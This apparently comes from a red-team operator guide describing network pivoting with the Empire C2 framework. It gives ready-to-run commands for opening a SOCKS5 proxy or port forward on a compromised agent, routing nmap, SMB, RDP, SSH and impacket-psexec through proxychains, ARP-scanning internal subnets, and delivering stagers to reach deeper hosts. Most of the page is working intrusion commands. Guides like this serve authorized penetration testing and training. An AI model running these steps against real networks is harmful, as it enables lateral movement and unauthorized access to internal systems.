Skip to main content

6. Pivoting


Overview​

Pivoting in Empire is done through a SOCKS5 proxy running on the agent. Once the proxy is up, you route tools on the Kali operator machine through proxychains to reach internal network segments that are not directly accessible.

Standard pivot flow:

  1. Agent running on a pivot host (internal network access)
  2. Run management/socks5 module on the agent to open a SOCKS5 proxy
  3. Add the proxy to /etc/proxychains4.conf
  4. Run any tool through proxychains to reach internal targets

Start a SOCKS5 Proxy on an Agent​

(Empire: <PIVOT_AGENT>) > usemodule management/socks5
(Empire: management/socks5) > set Agent <PIVOT_AGENT>
(Empire: management/socks5) > set Port 1080
(Empire: management/socks5) > execute

The proxy listens on the Empire server's loopback (127.0.0.1:1080), not the target - traffic is tunneled through the agent's C2 channel to the internal network.

note

The SOCKS5 proxy runs as long as the agent is alive. If the agent dies, the proxy drops and all tunneled connections break.


Configure Proxychains​

# Edit proxychains config on Kali
sudo nano /etc/proxychains4.conf

At the bottom of the file, under [ProxyList], add:

socks5  127.0.0.1  1080

Ensure dynamic_chain is enabled (not strict_chain) for reliability:

dynamic_chain

Use Tools Through the Proxy​

# Nmap through pivot - TCP connect scan only (-sT), no SYN scan
proxychains nmap -sT -Pn -p 22,80,443,445,3389 <INTERNAL_IP>

# SMB enumeration
proxychains smbclient -L //<INTERNAL_IP> -U '<DOMAIN>\<USERNAME>'%'<PASSWORD>'

# RDP through pivot
proxychains xfreerdp /v:<INTERNAL_IP> /u:<USERNAME> /p:'<PASSWORD>' /cert:ignore

# SSH through pivot
proxychains ssh <USERNAME>@<INTERNAL_IP>

# Impacket through pivot
proxychains impacket-psexec '<DOMAIN>/<USERNAME>:<PASSWORD>@<INTERNAL_IP>'
caution

nmap through proxychains requires -sT (TCP connect scan). SYN scans (-sS) send raw packets that proxychains cannot proxy - they will either fail silently or scan the wrong target. Always use -sT -Pn when scanning through a proxy.


Port Forwarding (Single Service)​

For accessing a single service rather than routing all traffic through SOCKS, use management/invoke_portfwd to forward a specific port.

(Empire: <PIVOT_AGENT>) > usemodule management/invoke_portfwd
(Empire: management/invoke_portfwd) > set Agent <PIVOT_AGENT>
(Empire: management/invoke_portfwd) > set ListenPort 3389
(Empire: management/invoke_portfwd) > set ConnectHost <INTERNAL_TARGET_IP>
(Empire: management/invoke_portfwd) > set ConnectPort 3389
(Empire: management/invoke_portfwd) > execute

Then connect directly to 127.0.0.1:3389 on the operator machine to reach the internal target's RDP.


Multi-Hop Pivoting​

For reaching networks two hops deep (e.g., attacking a host that is only reachable from an internal pivot host):

  1. Establish SOCKS5 on Pivot 1 (reachable from operator)
  2. Route a new stager delivery through proxychains to execute on Pivot 2
  3. When Pivot 2's agent checks in, run management/socks5 on it with a different port (e.g., 1081)
  4. Add the second proxy to proxychains config
  5. Route tools through both proxies to reach Segment 2
# /etc/proxychains4.conf - two-hop example
socks5 127.0.0.1 1080 # Pivot 1
socks5 127.0.0.1 1081 # Pivot 2

ARP Scan Through Pivot​

Discover live hosts on the internal network segment through the pivot agent without running Nmap:

(Empire: <PIVOT_AGENT>) > usemodule situational_awareness/network/arpscan
(Empire: situational_awareness/network/arpscan) > set Agent <PIVOT_AGENT>
(Empire: situational_awareness/network/arpscan) > set Range <SUBNET_CIDR>
(Empire: situational_awareness/network/arpscan) > execute

Standard Pivot Workflow​

1. Gain agent on pivot host
2. Run management/socks5 on agent (Port 1080)
3. Update /etc/proxychains4.conf - add socks5 127.0.0.1 1080
4. proxychains nmap -sT -Pn <INTERNAL_SUBNET> - discover targets
5. proxychains <tool> against internal targets
6. Deliver stager to internal host via proxychains if needed for deeper access